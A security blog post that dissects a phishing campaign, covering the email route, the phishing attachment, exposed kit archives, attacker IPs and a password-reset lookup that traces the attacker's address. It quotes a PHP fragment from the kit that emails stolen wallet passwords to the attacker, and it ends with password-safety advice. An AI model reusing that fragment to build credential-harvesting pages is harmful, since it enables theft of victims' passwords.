How NOT to Do Phishing Attacks (Part 2)

Apparently, my email address got into some kind of phishing database and therefore the article “How NOT to do phishing attacks” will now have a sequel.

I was again sent a phishing email and again in 5 minutes I found a bunch of phishing sites, downloaded phishing scripts (others) and found the passwords of phishing attack victims. For this reason, so that the passwords of these people do not spread further, I will partially gloss over the screenshots.

So the letter:

Standard check of mail way:

Email passed through email nodes:
slot0.globalpumps-com.ga (unknown [64.190.90.230]) -> sendmail8.hostland.ru (sendmail8.hostland.ru. [185.26.123.238]) -> mx.google.com -> Delivered-To: proghoster@gmail.com

Email contains:
MIME-parts in this message:
  1  text/html [] (0.4 kB)
  2 al@mi-al.ru.html text/html [attach] (5.2 kB)

I downloaded and open the attachment, and there is such beauty:

I really liked it – beautifully done!

POST data to the server is sent via the link: https://****store.xyz/prn/koriaxls.php

We look at the https://****store.xyz/prn/ folder.

The koriaxls.php script is the one that receives data from a phishing page. And officedesk.php is this:

In general, the author of the script messed up something with HTML tags there, instead of the table, unreadable data turned out. It’s easier to look at the HTML code to understand at least something:

There are several more folders at the root of the site!

According to past scripts, I noticed that attackers love to collect all the information – IP, country, browser, and more. I can’t imagine why ones need the IP address of the user whose email password was stolen?

Of course, the attacker is recorded in his own logs, doing script testing:

  • 158.69.116.60
  • 193.36.224.28
  • 193.36.224.44
  • 201.114.3.225

Let’s get a list of sites on the same server, we find another site ready to steal passwords:

And one more with the archive:

There is a page stealing passwords from some wallet on the blockchain:

There is the name Coded By x-Phisher and Gmail v3.0.0 – I have not figured out which of them is the author and which is the name of the program:

Dull scripts, I wrote the similar quality code when I studied at law school and studied PHP during the holidays. No, my code was still better! )))))

The entered credentials are sent to the attacker by mail. In the code you can find the following fragment:

$email_from = 'mugu@solveblock.com';//<== update the email address
$email_subject = "FIRST BLOCK CHAIN GRABS!!";
$email_body = "FROM WALLET ID: $name.\n-------".
    "----Here is the password:\n $message-----".

$to = "codycodysr@mail.com";//<== update the email address  

mugu@solveblock.com is a sender, that is, anything can be here. But codycodysr@mail.com is the mail of the recipient, it is possible that this is e-mail address belongs to the programmer of the phishing site or an attacker.

codycodysr@mail.com also from Nigeria

If you read the first part, then there were connections with Nigeria.

I went to mail.com, entered codycodysr@mail.com and clicked “I forgot my password”, this is what the site showed me:

See the phone number +234 ******* 922? On this service you can find out which country the telephone belongs to knowing only the first part of the number:

This number is also from Nigeria, although it differs from the first +2348189234582

Conclusion

On the one hand, the selected victims show that some preparing was being done to select the victims and send them messages so that they would not fall into spam folder – basically these are various small online businesses. Although there is more serious as well:

But on the other hand, there’s some kind of complete slovenliness with the archives of scripts left on the site in which the email is left, accessible to everyone the stolen passwords and even the attacker's IP…

The victims are international, but the advantage is still towards the Russian-speaking. At least one of the companies was aimed at targets whose mailing addresses end with .ru, including customers of @mail.ru service.

Recommendations on how to avoid becoming a victim of email theft

1. Use a strong password. This means long, with different types of characters, do not use real words or phrases, the password should be a meaningless character set.

2. Do not use the same password on different sites.

3. Change your passwords from time to time.

4. Do not store your passwords in text files on a computer or in cloud storage. Use password managers or store on encrypted partitions and media.

5. If after clicking on a link or opening a file you are prompted to enter a password, then there is a 99.99% chance that this is an attempt to steal your password.

6. Use only official programs downloaded from official sites. Do not use cracked programs from untrusted sources – they may contain viruses that steal passwords.

Last Updated on

Recommended for you:

Leave a Reply

Your email address will not be published.